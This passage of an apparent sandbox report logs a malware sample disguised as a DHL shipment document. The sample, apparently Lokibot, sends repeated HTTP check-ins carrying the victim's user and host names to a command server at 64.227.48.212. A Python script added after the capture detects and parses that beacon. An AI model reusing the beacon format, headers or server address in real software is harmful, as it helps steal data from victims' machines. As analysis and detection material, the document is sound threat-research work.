                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:23.510844946 CET | 181 | IN | Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d
                  Data Ascii: p--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff
                  Mar 21, 2023 07:13:23.510881901 CET182INData Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:23.680857897 CET184INData Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  2 | 192.168.2.4 | 49699 | 64.227.48.212 | 80 | C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 21, 2023 07:13:23.800014973 CET | 188 | OUT | POST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 163
                  Connection: close
                  Mar 21, 2023 07:13:23.967590094 CET | 189 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.rujones066656DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Mar 21, 2023 07:13:24.722923040 CET | 190 | IN | HTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:23 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  3 | 192.168.2.4 | 49700 | 64.227.48.212 | 80 | C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 21, 2023 07:13:25.127063990 CET | 208 | OUT | POST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 163
                  Connection: close
                  Mar 21, 2023 07:13:25.296231985 CET | 209 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.rujones066656DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Mar 21, 2023 07:13:26.076277018 CET | 210 | IN | HTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:25 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.4 | 49701 | 64.227.48.212 | 80 | C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 21, 2023 07:13:27.165441990 CET | 228 | OUT | POST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 163
                  Connection: close
                  Mar 21, 2023 07:13:27.333852053 CET | 229 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.rujones066656DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Mar 21, 2023 07:13:28.111509085 CET | 230 | IN | HTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:27 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:28.112008095 CET242INData Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:28.281061888 CET243INData Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  5 | 192.168.2.4 | 49702 | 64.227.48.212 | 80 | C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 21, 2023 07:13:28.916497946 CET | 273 | OUT | POST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 163
                  Connection: close
                  Mar 21, 2023 07:13:29.083960056 CET | 273 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.rujones066656DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Mar 21, 2023 07:13:29.829490900 CET | 275 | IN | HTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:28 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 
74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:29.829539061 CET | 276 | IN | Data Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:29.829566956 CET | 277 | IN | Data Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:29.829596043 CET | 278 | IN | Data Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
                  Mar 21, 2023 07:13:29.829627037 CET | 280 | IN | Data Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:29.829657078 CET | 281 | IN | Data Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:29.829688072 CET | 283 | IN | Data Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:29.829720020 CET | 284 | IN | Data Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:29.829747915 CET | 285 | IN | Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d
                  Data Ascii: p--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff
                  Mar 21, 2023 07:13:29.829778910 CET | 287 | IN | Data Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:29.996907949 CET | 288 | IN | Data Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0
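Added example, not part of the Joe Sandbox report and not the sample's own code. The POST in session 5 above is the Lokibot check-in: an HTTP/1.0 POST to a bare IP with the User-Agent "Mozilla/4.08 (Charon; Inferno)", Content-Type application/octet-stream, and the non-standard Content-Encoding: binary and Content-Key headers, carrying a length-prefixed body that opens with the binary ID "ckav.ru" followed by UTF-16 host strings. The 404 and the WordPress "Page not found" body that came back do not undo the check-in: the 163-byte body had already left the host, and the Link header shows that 64.227.48.212 is serving robertmario.is. The script rebuilds the request from the capture, flags it on its headers, and walks the body. The report prints only the first 82 of the 163 body bytes, so the parser treats a buffer that ends inside a field as a truncated record rather than as corruption. The field names (version, request type, binary ID) are an assumption taken from public Lokibot write-ups; the report itself does not name them.

```python
"""Added example (not part of the Joe Sandbox report): flag the Lokibot
check-in by its request headers and parse its length-prefixed body.

Request line, headers and body bytes are copied from the capture above.
The "Data Raw" row shows 82 of the 163 declared body bytes, so the parser
must cope with a buffer that ends inside a field. Field names are an
assumption taken from public Lokibot write-ups, not from the report."""
import struct

LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"

# Constructed from the capture on this page (request line and headers only).
LOKIBOT_REQUEST = (
    b"POST /?page_id=215360 HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: 64.227.48.212\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: 2F9D8E6A\r\n"
    b"Content-Length: 163\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

# The 82 body bytes printed in the "Data Raw" row above (163 were sent).
LOKIBOT_BODY_TRUNCATED = bytes.fromhex(
    "12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 "
    "6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 "
    "35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 "
    "2d 00 37 00 31 00 36 00 54 00 37"
)
DECLARED_CONTENT_LENGTH = 163


def parse_request(raw: bytes):
    """Split an HTTP request into (request line, {lower-cased header: value})."""
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def lokibot_indicators(raw: bytes) -> list:
    """Header-level indicators of the beacon seen in this capture, in match order."""
    request_line, headers = parse_request(raw)
    hits = []
    if headers.get("user-agent") == LOKIBOT_USER_AGENT:
        hits.append("user-agent")
    if "content-key" in headers:  # not a standard HTTP header
        hits.append("content-key")
    if headers.get("content-encoding", "").lower() == "binary":
        hits.append("content-encoding-binary")
    if request_line.startswith("POST ") and request_line.endswith(" HTTP/1.0"):
        hits.append("post-http/1.0")
    return hits


def parse_beacon(body: bytes, declared_length: int) -> dict:
    """Walk the beacon body: u16 version, u16 type, u16 zero, one u32-length
    ASCII string (the binary ID), then repeated [u16 flag=1][u32 byte
    length][UTF-16LE string]. A field whose declared length runs past the
    end of the buffer is reported as partial instead of raising."""
    version, request_type, _reserved = struct.unpack_from("<HHH", body, 0)
    off = 6
    (n,) = struct.unpack_from("<I", body, off)
    off += 4
    binary_id = body[off:off + n].decode("ascii")
    off += n

    fields, partial, truncated = [], None, False
    while off + 6 <= len(body):
        flag, n = struct.unpack_from("<HI", body, off)  # 2 + 4 bytes, no padding
        off += 6
        if flag != 1:
            break
        chunk = body[off:off + n]
        off += n
        # drop a dangling odd byte before decoding UTF-16
        text = chunk[: len(chunk) - len(chunk) % 2].decode("utf-16-le")
        if len(chunk) < n:  # the buffer ended inside this field
            truncated, partial = True, text
            break
        fields.append(text)
    return {
        "version": version,
        "request_type": request_type,
        "binary_id": binary_id,
        "fields": fields,
        "partial": partial,
        "truncated": truncated or len(body) < declared_length,
        "missing_bytes": max(declared_length - len(body), 0),
    }


if __name__ == "__main__":
    print(lokibot_indicators(LOKIBOT_REQUEST))
    print(parse_beacon(LOKIBOT_BODY_TRUNCATED, DECLARED_CONTENT_LENGTH))
```

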